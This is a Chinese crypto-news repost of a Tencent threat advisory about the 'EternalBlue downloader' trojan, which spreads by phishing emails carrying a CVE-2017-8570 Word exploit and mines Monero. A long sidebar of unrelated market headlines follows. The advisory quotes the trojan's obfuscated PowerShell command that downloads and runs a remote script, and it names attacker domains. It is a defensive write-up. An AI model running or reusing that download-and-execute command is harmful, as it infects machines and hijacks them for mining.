值得信赖的区块链资讯!
“永恒之蓝下载器木马”新增钓鱼邮件传播,利用用户机器挖矿门罗币
编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》
“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞(Office高危漏洞,又称沙虫二代)攻击代码。

如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:
C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。
本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。
永恒之蓝下载器木马的历次版本更新参考下表:

安全建议
1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;
3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用Windows Update进行。
来源:腾讯御见威胁情报中心
比推快讯
更多 >>- 数据:3 万枚 SOL 转入 Binance,价值约 231.69 万美元
- 美元指数上涨 0.1%,收于 96.928
- SEC主席:预测市场已成为监管“巨大问题”
- 数据:过去 24 小时全网爆仓 2.84 亿美元,多单爆仓 1.88 亿美元,空单爆仓 9,663.53 万美元
- Coinbase:目前用户无法进行买入、卖出或转账操作,正调查问题
- Anthropic 完成 300 亿美元融资,公司估值达 3800 亿美元
- Aave Labs 提议将 100%产品收入上缴 DAO 金库,拟确认 Aave V4 为核心架构
- 芝加哥期权交易所波动率指数 VIX 最新上涨至 20.05 点
- 罗素 2000 指数下跌 2.2%
- 特朗普政府秘密向伊朗走私 6000 个星链卫星终端
- 瑞典比特币财库公司 H100 完成收购 Future Holdings
- 分析师:现货黄金短线暴跌原因不明
- 以太坊跌破 1900 美元,24 小时跌幅 1.4%
- 数据:755.58 万枚 TRX 从 Binance 转出,价值约 209.59 万美元
- 美股延续跌势,纳指跌超 1.5%
- “开多-清算-继续开多”,麻吉大哥多单仓位再次面临部分清算
- 现货金银短线大幅跳水
- CZ 本次直播共计收到约 18000 美元打赏,将捐赠给 Giggle Academy
- Elon Musk 旗下 Grok AI 确认 X Money 正考虑集成 BTC
- CZ:非洲市场是任何加密平台都不应错过的黄金机会
- 数据:28054 枚 SOL 从 Fireblocks Custody 转出,价值约 226 万美元
- 纳指跌幅超过 1%
- 数据:今日加密货币市值前 100 代币涨跌
- CZ:预计 CEX 和 DEX 将长期共存,当前世界加密采用深度或不足 1%
- 某巨鲸向 Hyperliquid 存入 500 万美元并 5 倍杠杆做多 HYPE、ETH 及 BTC
- CZ:对比所有金融资产价值,加密采用不足 2%
- 特朗普关税 2026 年预计为美国家庭平均隐形增税 1300 美元
- 数据:479.1 万枚 TON 从匿名地址转出,经中转后流入 TON
- 强劲非农未能阻止美元走弱,看空情绪根深蒂固
- CZ:未来的 AI Agent 大概率都会采用加密货币用作结算
- CZ:RWA 在国家级层面受到热切关注,预测市场或将在世界杯期间热度攀升
- 美银:美财政部与美联储“潜在协议”难撼市场
- CZ:近期很多假新闻或由中文竞品/友商散布,中文社区应团结扩大国际影响力
- VanEck:已知有 13 个政府正在积极进行比特币挖矿
- Utexo:推出适配层以支持 Tether 钱包开发套件的 RGB 协议
- CZ:项目方应专心打磨产品,无需过度和其他项目作比较
- 某巨鲸向币安存入 1800 枚 BTC,价值 1.22 亿美元
- 某巨鲸再向 Binance 转入 1,800 枚比特币,价值约 1.22 亿美元
- CZ:对世界做出贡献会感到满足,目前有条件去做自己想做的事
- 巴基斯坦加密监管负责人:加密货币是大众的阶梯,而非奢侈品
- 日本数字金融平台 PayPay 提交美国 IPO 申请
- 纽约首家免费杂货店 The Polymarket 今日正式开业
- CZ:开发者不应过于担心短期市场,但发币项目应持续更新并和社区保持沟通
- CZ:币安广场的内容不仅限于 Crypto,也欢迎更多领域高质量内容
- CZ:交易者在熊市需谨慎评估风险,个人无法预料行业牛熊走势
- CZ:要让 Meme 币持续下去,他们有非常强的文化元素
- 特朗普对 BBC 百亿美元诽谤诉讼定于 2027 年 2 月开庭审理
- 某巨鲸平仓 HYPE 与 XMR 空单,获利约 310 万美元
- Lighter 与 Circle 达成合作,将共享平台上 USDC 存款所产生收益
- 数据:435.91 枚 BTC 从 Grayscale 转入 Coinbase Prime,价值约 1802 万美元
比推专栏
更多 >>- Was it finished?|0206 Asian
- 围猎以太坊多头:「巨鲸」们暴亏 70 亿美元,正被集体围观
- Challenge,risk And chances|0130 Asian
- Meta 豪赌 AI:砸钱 1350 亿美元,2026 的扎克伯格,值得相信么?
- Variables: Terrible snowstorm|0128 Asian
- 英特尔「生死线」时刻:在 ICU 门前,陈立武如何清算遗产并开启自救?
- 從1月13號到今天,提前到5100|0126Asian
- You Should work HARDER in 2026|0120 Asian
- 硅谷最聪明那群人的「终极推演」:2026,我们应该「All-In」什么?
- Notice us dollar index|0116 in us
观点
比推热门文章
- SEC主席:预测市场已成为监管“巨大问题”
- 数据:过去 24 小时全网爆仓 2.84 亿美元,多单爆仓 1.88 亿美元,空单爆仓 9,663.53 万美元
- 暴跌、量子威胁、VC离场:加密行业为什么FUD
- Coinbase:目前用户无法进行买入、卖出或转账操作,正调查问题
- Anthropic 完成 300 亿美元融资,公司估值达 3800 亿美元
- Aave Labs 提议将 100%产品收入上缴 DAO 金库,拟确认 Aave V4 为核心架构
- 芝加哥期权交易所波动率指数 VIX 最新上涨至 20.05 点
- 罗素 2000 指数下跌 2.2%
- 特朗普政府秘密向伊朗走私 6000 个星链卫星终端
- 瑞典比特币财库公司 H100 完成收购 Future Holdings
比推 APP



